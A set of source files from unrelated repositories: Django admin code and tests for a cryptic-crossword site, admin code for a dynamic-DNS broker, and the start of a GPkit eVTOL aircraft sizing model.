"""Add an XML import field."""
file_import = FileField(label='Import from XML', required=False)
class Meta:
model = Puzzle
fields = ['number', 'user', 'pub_date', 'comments']
class EntryInline(admin.StackedInline):
"""Increase the length of the text field for puzzle clues."""
model = Entry
formfield_overrides = {CharField: {'widget': TextInput(attrs={'size':'100'})}}
class PuzzleAdmin(admin.ModelAdmin):
"""Show entries inline and allow import from XML"""
form = PuzzleImportForm
inlines = [EntryInline]
def save_model(self, request, obj, form, change):
super(PuzzleAdmin, self).save_model(request, obj, form, change)
xml_file = form.cleaned_data.get('file_import', None)
if xml_file:
import_from_xml(xml_file, obj)
class BlankImportForm(ModelForm):
"""Add an ipuz import field."""
file_import = FileField(label='Import from ipuz', required=False)
class Meta:
model = Blank
fields = ['display_order']
class BlockInline(admin.TabularInline):
"""Show blocks in a table."""
model = Block
class BlankAdmin(admin.ModelAdmin):
"""Show blocks inline and allow import from ipuz."""
form = BlankImportForm
inlines = [BlockInline]
save_as = True
def save_model(self, request, obj, form, change):
super(BlankAdmin, self).save_model(request, obj, form, change)
ipuz_file = form.cleaned_data.get('file_import', None)
if ipuz_file:
import_blank_from_ipuz(ipuz_file, obj)
admin.site.site_header = "Three Pins Administration"
admin.site.site_title = "Three Pins"
admin.site.register(Puzzle, PuzzleAdmin)
admin.site.register(Blank, BlankAdmin)
```
#### File: threepins/puzzle/tests.py
```python
from datetime import timedelta, datetime
from django.test import TestCase
from django.utils import timezone
from django.urls import reverse
from django.contrib.auth.models import User
from puzzle.models import Puzzle, Entry, Blank, Block
from puzzle.feeds import PuzzleFeed
from puzzle.construction import create_grid, create_thumbnail, get_clues, get_date_string
from puzzle.admin import import_from_xml, import_blank_from_ipuz
from visitors.models import Visitor
def get_user():
"""Helper to get the first user in the database, creating one if necessary."""
if User.objects.filter(is_superuser=False).count():
return User.objects.get(is_superuser=False)
return User.objects.create_user('test', '<EMAIL>', 'password')
def get_superuser():
"""Helper to get the superuser, creating one if necessary."""
if User.objects.filter(is_superuser=True).count():
return User.objects.get(is_superuser=True)
return User.objects.create_superuser('super', '<EMAIL>', 'password')
def create_small_puzzle():
"""Helper to insert a 3x3 puzzle into the database."""
size = 3
puzzle = Puzzle.objects.create(size=size, user=get_superuser())
Entry.objects.create(puzzle=puzzle, clue='1a', answer='ab c', x=0, y=0, down=False)
Entry.objects.create(puzzle=puzzle, clue='3a', answer='x-yz', x=0, y=2, down=False)
Entry.objects.create(puzzle=puzzle, clue='1d', answer='amx', x=0, y=0, down=True)
Entry.objects.create(puzzle=puzzle, clue='2d', answer='cnz', x=2, y=0, down=True)
return puzzle
def create_puzzle_range():
"""Helper to add a bunch of small puzzles to the database, some published and some not."""
for i in range(-2, 3):
puzzle = create_small_puzzle()
puzzle.pub_date = timezone.now() + timedelta(days=i)
puzzle.save()
def create_empty_staff_puzzle(number, pub_date):
"""Helper to add an empty puzzle belonging to staff to the database."""
return Puzzle.objects.create(number=number, user=get_superuser(), pub_date=pub_date)
class PuzzleModelTests(TestCase):
"""Tests for new puzzle creation."""
def test_default_user(self):
"""Check that the default user is applied to a new puzzle."""
get_superuser()
puz = Puzzle.objects.create(number=0, pub_date=timezone.now())
self.assertEqual(puz.user.username, 'super')
def test_default_numbering(self):
"""Check that the default puzzle number is applied to a new puzzle."""
puz = Puzzle.objects.create(user=get_user(), pub_date=timezone.now())
self.assertEqual(puz.number, 0)
puz = Puzzle.objects.create(user=get_user(), pub_date=timezone.now())
self.assertEqual(puz.number, 1)
def test_default_pub_date(self):
"""Check that the default publish date is applied to a new puzzle."""
puz = Puzzle.objects.create(number=0, user=get_user())
self.assertTrue(puz.pub_date > timezone.now())
self.assertEqual(puz.pub_date.year, 2100)
self.assertEqual(puz.pub_date.hour, 0)
self.assertEqual(puz.pub_date.second, 0)
def test_puzzle_url(self):
"""Check the absolute URL for a puzzle."""
puz = Puzzle.objects.create(user=get_user(), pub_date=timezone.now())
self.assertIn(get_user().username, puz.get_absolute_url())
self.assertIn(str(puz.number), puz.get_absolute_url())
class FeedTests(TestCase):
"""Tests for RSS feed generation."""
def test_most_recent_first(self):
"""Check that the RSS feed appears in reverse chronological order."""
create_empty_staff_puzzle(0, timezone.now() - timedelta(days=2))
create_empty_staff_puzzle(1, timezone.now() - timedelta(days=1))
create_empty_staff_puzzle(2, timezone.now())
feed = PuzzleFeed()
self.assertEqual(feed.items()[0].number, 2)
self.assertEqual(feed.items()[1].number, 1)
self.assertEqual(feed.items()[2].number, 0)
def test_published_puzzles_only(self):
"""Check that unpublished puzzles don't appear in the feed."""
create_empty_staff_puzzle(0, timezone.now() - timedelta(days=1))
create_empty_staff_puzzle(1, timezone.now())
create_empty_staff_puzzle(2, timezone.now() + timedelta(days=1))
feed = PuzzleFeed()
self.assertEqual(feed.items().count(), 2)
self.assertEqual(feed.items()[0].number, 1)
self.assertEqual(feed.items()[1].number, 0)
def test_limited_number(self):
"""Check that only the 5 most recent puzzles appear in the feed."""
num_puzzles = 10
limit = 5
for i in range(num_puzzles):
create_empty_staff_puzzle(i, timezone.now() - timedelta(days=num_puzzles - i))
feed = PuzzleFeed()
self.assertEqual(feed.items().count(), limit)
def test_staff_only(self):
"""Check that puzzles created by normal users don't appear in the feed."""
pub_date = timezone.now()
Puzzle.objects.create(number=0, user=get_superuser(), pub_date=pub_date)
Puzzle.objects.create(number=1, user=get_user(), pub_date=pub_date)
feed = PuzzleFeed()
self.assertEqual(feed.items().count(), 1)
self.assertEqual(feed.items()[0].number, 0)
class GridCreationTests(TestCase):
"""Tests for the grid rendering process."""
def test_create_grid_pattern(self):
"""Check that the small 3x3 grid is rendered with the correct block pattern."""
grid = create_grid(create_small_puzzle(), 3)
for row in range(3):
for col in range(3):
self.assertEqual(grid[row][col]['row'], row)
self.assertEqual(grid[row][col]['col'], col)
if row == 1 and col == 1:
self.assertNotIn('light', grid[row][col]['type'])
self.assertIn('block', grid[row][col]['type'])
else:
self.assertIn('light', grid[row][col]['type'])
self.assertNotIn('block', grid[row][col]['type'])
def test_create_grid_clue_numbers(self):
"""Check that numbers have been added to the correct squares."""
grid = create_grid(create_small_puzzle(), 3)
expected_numbers = [[1, None, 2], [None, None, None], [3, None, None]]
for row in range(3):
for col in range(3):
self.assertEqual(grid[row][col]['number'], expected_numbers[row][col])
def test_create_grid_letters(self):
"""Check that letters of the solution have been added to the correct squares."""
grid = create_grid(create_small_puzzle(), 3)
expected_letters = [['A', 'B', 'C'], ['M', None, 'N'], ['X', 'Y', 'Z']]
for row in range(3):
for col in range(3):
self.assertEqual(grid[row][col]['letter'], expected_letters[row][col])
def test_create_grid_borders(self):
"""Check that topmost and leftmost attributes have been applied to the borders."""
grid = create_grid(create_small_puzzle(), 3)
for row in range(3):
for col in range(3):
if row == 0:
self.assertIn('topmost', grid[row][col]['type'])
else:
self.assertNotIn('topmost', grid[row][col]['type'])
if col == 0:
self.assertIn('leftmost', grid[row][col]['type'])
else:
self.assertNotIn('leftmost', grid[row][col]['type'])
class ThumbnailTests(TestCase):
"""Tests of SVG creation for blank grids."""
def test_create_thumbnail(self):
"""Create an SVG for a 3x3 blank grid."""
blank = Blank.objects.create(id=1, size=3)
Block.objects.create(blank=blank, y=0, x=2)
Block.objects.create(blank=blank, y=1, x=0)
Block.objects.create(blank=blank, y=2, x=1)
svg = create_thumbnail(blank, 10)
self.assertIn('<svg width="30" height="30">', svg)
self.assertIn(
'rect y="0" x="0" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="0" x="10" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="0" x="20" width="10" height="10" style="fill:rgb(0,0,0);', svg)
self.assertIn(
'rect y="10" x="0" width="10" height="10" style="fill:rgb(0,0,0);', svg)
self.assertIn(
'rect y="10" x="10" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="10" x="20" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="20" x="0" width="10" height="10" style="fill:rgb(255,255,255);', svg)
self.assertIn(
'rect y="20" x="10" width="10" height="10" style="fill:rgb(0,0,0);', svg)
self.assertIn(
'rect y="20" x="20" width="10" height="10" style="fill:rgb(255,255,255);', svg)
class ClueCreationTests(TestCase):
"""Tests for clue rendering, including clue numbers and numeration."""
def test_get_clues(self):
"""Create and check the clue lists for the small 3x3 puzzle."""
puz = create_small_puzzle()
grid = create_grid(puz, 3)
across_clues = get_clues(puz, grid, False)
self.assertEqual(len(across_clues), 2)
self.assertEqual(across_clues[0]['number'], 1)
self.assertEqual(across_clues[0]['clue'], '1a')
self.assertEqual(across_clues[0]['numeration'], '2,1')
self.assertEqual(across_clues[1]['number'], 3)
self.assertEqual(across_clues[1]['clue'], '3a')
self.assertEqual(across_clues[1]['numeration'], '1-2')
down_clues = get_clues(puz, grid, True)
self.assertEqual(len(down_clues), 2)
self.assertEqual(down_clues[0]['number'], 1)
self.assertEqual(down_clues[0]['clue'], '1d')
self.assertEqual(down_clues[0]['numeration'], '3')
self.assertEqual(down_clues[1]['number'], 2)
self.assertEqual(down_clues[1]['clue'], '2d')
self.assertEqual(down_clues[1]['numeration'], '3')
class DateFormattingTests(TestCase):
"""Tests for the date format shown above the puzzle."""
def test_get_date_string(self):
"""Check that the date string is in the expected format."""
test_date = datetime(1980, 3, 4, 1, 2, 3, tzinfo=timezone.get_default_timezone())
puz = Puzzle.objects.create(user=get_user(), pub_date=test_date)
self.assertEqual(get_date_string(puz), '04 Mar 1980')
class PuzzleViewTests(TestCase):
"""Tests for the various puzzle solving views."""
def log_in_super_user(self):
"""Helper function to create and log in a superuser."""
get_superuser()
self.client.login(username='super', password='password')
def log_out_super_user(self):
"""Helper function to log out the superuser."""
self.client.logout()
def test_home_page_grid_squares(self):
"""Check that a puzzle grid has been rendered into the home page."""
create_puzzle_range()
response = self.client.get('/')
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertEqual(response.content.count('class="light'.encode('utf-8')), 8)
self.assertEqual(response.content.count('class="block'.encode('utf-8')), (15 * 15) - 8)
self.assertEqual(response.content.count('topmost'.encode('utf-8')), 15)
self.assertEqual(response.content.count('leftmost'.encode('utf-8')), 15)
self.assertEqual(response.content.count('class="grid-number"'.encode('utf-8')), 3)
self.assertEqual(response.content.count('data-a='.encode('utf-8')), 8)
for i in range(3):
search_str = 'data-x="%i"' % i
self.assertEqual(response.content.count(search_str.encode('utf-8')), 15)
search_str = 'data-y="%i"' % i
self.assertEqual(response.content.count(search_str.encode('utf-8')), 15)
def test_home_page_clues(self):
"""Check that clues have been created and inserted into the page."""
create_puzzle_range()
response = self.client.get('/')
self.assertContains(response, 'clue-box')
self.assertEqual(response.content.count('clue-number'.encode('utf-8')), 4)
def test_home_page_wrapping(self):
"""Check that the page has a title, description, and a link to the previous puzzle."""
create_puzzle_range()
response = self.client.get('/')
self.assertContains(response, '<title>Three Pins - A cryptic crossword outlet</title>')
self.assertContains(response, '<meta name="description" content="A free interactive site')
self.assertContains(response, '< Previous')
self.assertNotContains(response, 'Next >')
self.assertContains(response, reverse('solution', args=['super', 2]))
def test_home_page_contains_latest(self):
"""Check that the puzzle number matches the latest published puzzle in the database."""
create_puzzle_range()
response = self.client.get('/')
self.assertNotContains(response, 'data-number="1"')
self.assertContains(response, 'data-number="2"')
self.assertNotContains(response, 'data-number="3"')
def test_home_page_answers_hidden(self):
"""Check that the solution is not visible."""
create_puzzle_range()
response = self.client.get('/')
self.assertNotContains(response, 'class="letter"')
def test_puzzle_without_previous(self):
"""Check that there is no 'previous' link when showing the very first puzzle."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 0]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="0"')
self.assertNotContains(response, '< Previous')
self.assertContains(response, 'Next >')
self.assertContains(response, '<title>Crossword #0 | super | Three Pins</title>')
def test_next_and_previous(self):
"""Check that 'next' and 'previous' links are present when possible."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="1"')
self.assertContains(response, '< Previous')
self.assertContains(response, 'Next >')
self.assertContains(response, '<title>Crossword #1 | super | Three Pins</title>')
def test_future_inaccessible(self):
"""Check that requests for unpublished puzzles by other authors receive a 403."""
create_puzzle_range()
get_user()
self.client.login(username='test', password='password')
response = self.client.get(reverse('puzzle', args=['super', 3]))
self.assertEqual(response.status_code, 403)
response = self.client.get(reverse('solution', args=['super', 3]))
self.assertEqual(response.status_code, 403)
self.client.logout()
def test_preview_future_puzzle(self):
"""Check that previews are visible to a logged in superuser."""
create_puzzle_range()
self.log_in_super_user()
response = self.client.get(reverse('puzzle', args=['super', 3]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="3"')
self.assertNotContains(response, 'class="letter"')
self.assertContains(response, '<title>Crossword #3 | super | Three Pins</title>')
self.log_out_super_user()
def test_solution_available(self):
"""Check that solutions are rendered into the solution page."""
create_puzzle_range()
response = self.client.get(reverse('solution', args=['super', 2]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="2"')
self.assertEqual(response.content.count('class="letter"'.encode('utf-8')), 8)
self.assertContains(response, '<title>Solution #2 | super | Three Pins</title>')
def test_preview_solution_available(self):
"""Check that solutions are rendered into the preview solution page."""
create_puzzle_range()
self.log_in_super_user()
response = self.client.get(reverse('solution', args=['super', 3]))
self.assertContains(response, 'class="puzzle"')
self.assertContains(response, 'id="grid"')
self.assertContains(response, 'data-number="3"')
self.assertEqual(response.content.count('class="letter"'.encode('utf-8')), 8)
self.assertContains(response, '<title>Solution #3 | super | Three Pins</title>')
self.log_out_super_user()
def test_invalid_puzzle(self):
"""Check that an invalid puzzle number results in a 404."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 100]))
self.assertEqual(response.status_code, 404)
def test_invalid_solution(self):
"""Check that an invalid solution number results in a 404."""
create_puzzle_range()
response = self.client.get(reverse('solution', args=['super', 100]))
self.assertEqual(response.status_code, 404)
def test_user_list(self):
"""Check that the user page lists all published puzzles."""
create_puzzle_range()
response = self.client.get(reverse('users'))
self.assertNotContains(response, reverse('puzzle', args=['super', 4]))
self.assertNotContains(response, reverse('puzzle', args=['super', 3]))
self.assertContains(response, reverse('puzzle', args=['super', 2]))
self.assertContains(response, reverse('puzzle', args=['super', 1]))
self.assertContains(response, reverse('puzzle', args=['super', 0]))
def test_empty_index_list(self):
"""Check that the archive page still works if there are no puzzles in the database."""
response = self.client.get(reverse('users'))
self.assertEqual(response.status_code, 200)
def test_redirect_legacy_url(self):
"""Check that the old /puzzle/N URLs redirect to the default setter."""
create_puzzle_range()
response = self.client.get('/puzzle/1', follow=True)
self.assertRedirects(response, '/setter/super/1/', status_code=301)
class PuzzleEditTests(TestCase):
"""Tests for creating and editing puzzles."""
def verify_entry(self, entry, expected):
"""Helper to check that an individual entry matches expected parameters."""
self.assertEqual(entry.puzzle, expected['puzzle'])
self.assertEqual(entry.clue, expected['clue'])
self.assertEqual(entry.answer.upper(), expected['answer'].upper())
self.assertEqual(entry.x, expected['startx'])
self.assertEqual(entry.y, expected['starty'])
self.assertEqual(entry.down, expected['down'])
def test_anon_user_no_edit_link(self):
"""Check that anonymous users don't see an edit link on the puzzle pages."""
create_puzzle_range()
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertNotContains(response, reverse('edit', args=['super', 1]))
def test_wrong_user_no_edit_link(self):
"""Check that users don't see an edit link on puzzles belonging to other authors."""
create_puzzle_range()
get_user()
self.client.login(username='test', password='password')
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertNotContains(response, reverse('edit', args=['super', 1]))
self.client.logout()
def test_authorised_user_edit_link(self):
"""Check that authors see an edit link on their puzzle pages."""
create_puzzle_range()
self.client.login(username='super', password='password')
response = self.client.get(reverse('puzzle', args=['super', 1]))
self.assertContains(response, reverse('edit', args=['super', 1]))
self.client.logout()
def test_wrong_user_no_edit_page(self):
"""Check that users can't get to the edit page of other users' puzzles."""
create_puzzle_range()
get_user()
self.client.login(username='test', password='password')
response = self.client.get(reverse('edit', args=['super', 1]))
self.assertEqual(response.status_code, 403)
def test_edit_page_populated(self):
"""Check that the puzzle is pre-populated with existing contents for editing."""
create_puzzle_range()
self.client.login(username='super', password='password')
response = self.client.get(reverse('edit', args=['super', 1]))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.count('class="light'.encode('utf-8')), 8)
self.assertEqual(response.content.count('class="block'.encode('utf-8')), (15 * 15) - 8)
self.assertEqual(response.content.count('clue-number'.encode('utf-8')), 4)
def test_unauthorised_user_no_save(self):
"""Make sure users can't POST data directly into other users' puzzles."""
get_user()
self.client.login(username='test', password='password')
response = self.client.post(reverse('save'), {'author': 'super', 'number': 1, 'ipuz': '{}'})
self.assertEqual(response.status_code, 403)
response = self.client.post(reverse('save'), {'author': 'notme', 'number': 1, 'ipuz': '{}'})
self.assertEqual(response.status_code, 403)
def test_save_new_puzzle(self):
"""Check that a valid POST of puzzle data gets stored in the database."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["A","B","C"],["M","#","N"],["X","Y","Z"]]' \
'}'
user = get_user()
self.client.login(username='test', password='password')
response = self.client.post(reverse('save'), {'author': '', 'number': '', 'ipuz': ipuz})
self.assertEqual(response.status_code, 200)
puz = Puzzle.objects.get(user=user, number=1)
entries = Entry.objects.filter(puzzle=puz).order_by('down', 'y', 'x')
self.assertEqual(len(entries), 4)
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'ab c',
'startx': 0, 'starty': 0, 'down': False})
self.verify_entry(entries[1], {'puzzle': puz, 'clue': '3a', 'answer': 'xyz',
'startx': 0, 'starty': 2, 'down': False})
self.verify_entry(entries[2], {'puzzle': puz, 'clue': '1d', 'answer': 'amx',
'startx': 0, 'starty': 0, 'down': True})
self.verify_entry(entries[3], {'puzzle': puz, 'clue': '2d', 'answer': 'c-nz',
'startx': 2, 'starty': 0, 'down': True})
self.client.logout()
def test_new_user_save_puzzle(self):
"""Check that new users can create credentials and save."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["A","B","C"],["M","#","N"],["X","Y","Z"]]' \
'}'
response = self.client.post(reverse('save'), {'author': '', 'number': '', 'ipuz': ipuz,
'username': 'Newbie', 'password': '<PASSWORD>',
'email': '<EMAIL>'})
self.assertEqual(response.status_code, 200)
user = User.objects.get(username='Newbie')
self.assertEqual(user.email, '<EMAIL>')
puz = Puzzle.objects.get(user=user, number=1)
self.assertEqual(len(Entry.objects.filter(puzzle=puz)), 4)
def test_existing_user_login_save(self):
"""Check that existing users can provide credentials and save."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["A","B","C"],["M","#","N"],["X","Y","Z"]]' \
'}'
user = get_user()
response = self.client.post(reverse('save'), {'author': '', 'number': '', 'ipuz': ipuz,
'username': user.username,
'password': 'password', 'email': ''})
self.assertEqual(response.status_code, 200)
puz = Puzzle.objects.get(user=user, number=1)
self.assertEqual(len(Entry.objects.filter(puzzle=puz)), 4)
def test_update_existing_puzzle(self):
"""Check that POSTed data can overwrite existing puzzle data."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["D","E","F"],["M","#","N"],["X","Y","Z"]]' \
'}'
create_puzzle_range()
puz = Puzzle.objects.get(user=get_superuser(), number=1)
entries = Entry.objects.filter(puzzle=puz).order_by('down', 'y', 'x')
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'ab c',
'startx': 0, 'starty': 0, 'down': False})
self.client.login(username='super', password='password')
response = self.client.post(reverse('save'),
{'author': 'super', 'number': '1', 'ipuz': ipuz})
self.assertEqual(response.status_code, 302)
puz = Puzzle.objects.get(user=get_superuser(), number=1)
entries = Entry.objects.filter(puzzle=puz).order_by('down', 'y', 'x')
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'de f',
'startx': 0, 'starty': 0, 'down': False})
self.client.logout()
class PuzzleAdminTests(TestCase):
"""Tests for custom admin functionality."""
def verify_entry(self, entry, expected):
"""Helper to check that an individual entry matches expected parameters."""
self.assertEqual(entry.puzzle, expected['puzzle'])
self.assertEqual(entry.clue, expected['clue'])
self.assertEqual(entry.answer, expected['answer'])
self.assertEqual(entry.x, expected['startx'])
self.assertEqual(entry.y, expected['starty'])
self.assertEqual(entry.down, expected['down'])
def test_import_from_xml(self):
"""Import a test XML file and check the results."""
puz = Puzzle.objects.create(user=get_user())
import_from_xml('puzzle/test_data/small.xml', puz)
entries = Entry.objects.order_by('down', 'y', 'x')
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'ab c',
'startx': 0, 'starty': 0, 'down': False})
self.verify_entry(entries[1], {'puzzle': puz, 'clue': '3a', 'answer': 'xyz',
'startx': 0, 'starty': 2, 'down': False})
self.verify_entry(entries[2], {'puzzle': puz, 'clue': '1d', 'answer': 'amx',
'startx': 0, 'starty': 0, 'down': True})
self.verify_entry(entries[3], {'puzzle': puz, 'clue': '2d', 'answer': 'c-nz',
'startx': 2, 'starty': 0, 'down': True})
def verify_block(self, block, blank, x_coord, y_coord):
"""Helper to check that an individual block matches expected parameters."""
self.assertEqual(block.blank, blank)
self.assertEqual(block.x, x_coord)
self.assertEqual(block.y, y_coord)
def verify_blocks_in_row(self, blocks, blank, row, expected_cols):
""" Helper to check that one row of a grid has blocks in the expected columns.
blocks - An array of block objects belonging one row of the grid.
blank - The blank object they belong to.
row - The row number.
expected_cols - The column numbers which we expect to be blocks.
"""
self.assertEqual(len(blocks), len(expected_cols))
for idx, col in enumerate(expected_cols):
self.verify_block(blocks[idx], blank, col, row)
def test_import_from_ipuz(self):
"""Import a blank grid from an ipuz file and check the result."""
blank = Blank.objects.create()
file = open('puzzle/test_data/ettu.ipuz', 'rb')
import_blank_from_ipuz(file, blank)
blocks = Block.objects.order_by('y', 'x')
self.verify_blocks_in_row(blocks[0:1], blank, 0, [11])
self.verify_blocks_in_row(blocks[1:8], blank, 1, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[8:15], blank, 3, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[15:16], blank, 4, [5])
self.verify_blocks_in_row(blocks[16:25], blank, 5, [0, 1, 3, 4, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[25:26], blank, 6, [6])
self.verify_blocks_in_row(blocks[26:35], blank, 7, [1, 2, 3, 5, 7, 9, 11, 12, 13])
self.verify_blocks_in_row(blocks[35:36], blank, 8, [8])
self.verify_blocks_in_row(blocks[36:45], blank, 9, [1, 3, 5, 7, 9, 10, 11, 13, 14])
self.verify_blocks_in_row(blocks[46:53], blank, 11, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[53:60], blank, 13, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[60:], blank, 14, [3])
file.close()
class VisitorLogTests(TestCase):
"""Tests for visitor logging when a puzzle is viewed."""
def test_log_visitor(self):
"""Check that one log entry per request is created."""
create_puzzle_range()
self.client.get('/')
self.client.get('/')
self.client.get('/')
self.assertEqual(Visitor.objects.count(), 3)
def test_limit_visitor_list(self):
"""Check that the 100 most recent visitors are kept in the log."""
create_puzzle_range()
start_time = timezone.now()
for i in range(150):
Visitor.objects.create(ip_addr='', user_agent='', path='', referrer='',
date=start_time + timedelta(minutes=i))
self.client.get('/')
self.assertEqual(Visitor.objects.count(), 100)
self.assertEqual(Visitor.objects.order_by('date').first().date,
start_time + timedelta(minutes=50))
self.assertEqual(Visitor.objects.order_by('date').last().date,
start_time + timedelta(minutes=149))
``` |
{
"source": "jomority/ddnsbroker",
"score": 2
} |
#### File: src/ddnsbroker/admin.py
```python
from django.contrib import admin
from django.contrib import messages
from ddnsbroker.models import Host, UpdateService, Record
class RecordInline(admin.TabularInline):
model = Record
class HostAdmin(admin.ModelAdmin):
fieldsets = (
(None, {
'fields': ('fqdn', 'secret', ('ipv4_enabled', 'ipv6_enabled'))
}),
('Manual IPs', {
'classes': ('collapse',),
'fields': ('ipv4', 'ipv6')
})
)
list_display = ('fqdn', 'ipv4_enabled', 'ipv6_enabled', 'ipv4', 'ipv6')
list_editable = ('ipv4_enabled', 'ipv6_enabled', 'ipv4', 'ipv6')
list_filter = ('ipv4_enabled', 'ipv6_enabled')
search_fields = ('fqdn',)
inlines = [RecordInline]
def add_view(self, request, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(HostAdmin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(HostAdmin, self).change_view(request, object_id, form_url, extra_context)
class RecordAdmin(admin.ModelAdmin):
fieldsets = (
(None, {
'fields': ('host', 'fqdn', ('ipv4_enabled', 'ipv6_enabled'))
}),
('Record composition', {
'fields': ('ipv4_netmask', 'ipv4_host_id', 'ipv6_netmask', 'ipv6_host_id')
}),
('Update service', {
'fields': ('service', 'username', 'password')
})
)
list_display = ('fqdn', 'host', 'ipv4_enabled', 'ipv6_enabled', 'effective_ipv4', 'effective_ipv6', 'service')
list_editable = ('ipv4_enabled', 'ipv6_enabled')
list_filter = (
('host', admin.RelatedOnlyFieldListFilter),
'ipv4_enabled',
'ipv6_enabled',
('service', admin.RelatedOnlyFieldListFilter)
)
save_as = True
save_as_continue = False
search_fields = ('fqdn', 'host__fqdn')
actions = ['update_records']
def update_records(self, request, queryset): # TODO: maybe with intermediate page because it could take long
for record in queryset:
pass
self.message_user(request, "This function is not yet implemented", level=messages.WARNING)
update_records.short_description = "Force update selected records"
def add_view(self, request, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(RecordAdmin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(RecordAdmin, self).change_view(request, object_id, form_url, extra_context)
class UpdateServiceAdmin(admin.ModelAdmin):
list_display = ('name', 'url')
search_fields = ('name', 'url')
admin.site.register(Host, HostAdmin)
admin.site.register(Record, RecordAdmin)
admin.site.register(UpdateService, UpdateServiceAdmin)
```
#### File: ddnsbroker/tools/ip.py
```python
from ipaddress import IPv6Address, AddressValueError
def normalize_ip(ip: str) -> str:
try:
ip6 = IPv6Address(ip)
ret = ip6.ipv4_mapped or ip6
return str(ret)
except AddressValueError:
return ip
``` |
{
"source": "jomorlier/eVTOL",
"score": 3
} |
#### File: jomorlier/eVTOL/aircraft_models.py
```python
import math
import numpy as np
from gpkit import Variable, Model, Vectorize, ureg
from gpkit.constraints.bounded import Bounded
from standard_atmosphere import stdatmo
class OnDemandAircraft(Model):
def setup(self,autonomousEnabled=False):
TOGW = Variable("TOGW","lbf","Aircraft takeoff gross weight")
W_empty = Variable("W_{empty}","lbf","Weight without passengers or crew")
C_eff = Variable("C_{eff}","kWh","Effective battery capacity")
g = Variable("g",9.807,"m/s**2","Gravitational acceleration")
L_D_cruise = Variable("L_D_cruise","-","Cruise L/D ratio")
L_D_loiter = Variable("L_D_loiter","-","Loiter L/D ratio (approximation)")
eta_cruise = Variable("\eta_{cruise}","-","Cruise propulsive efficiency")
tailRotor_power_fraction_hover = Variable("tailRotor_power_fraction_hover",
0.001,"-","Tail-rotor power as a fraction of lifting-rotors power")
tailRotor_power_fraction_levelFlight = Variable("tailRotor_power_fraction_levelFlight",
0.001,"-","Tail-rotor power as a fraction of lifting-rotors power")
cost_per_weight = Variable("cost_per_weight","lbf**-1",
"Cost per unit empty weight of the aircraft")
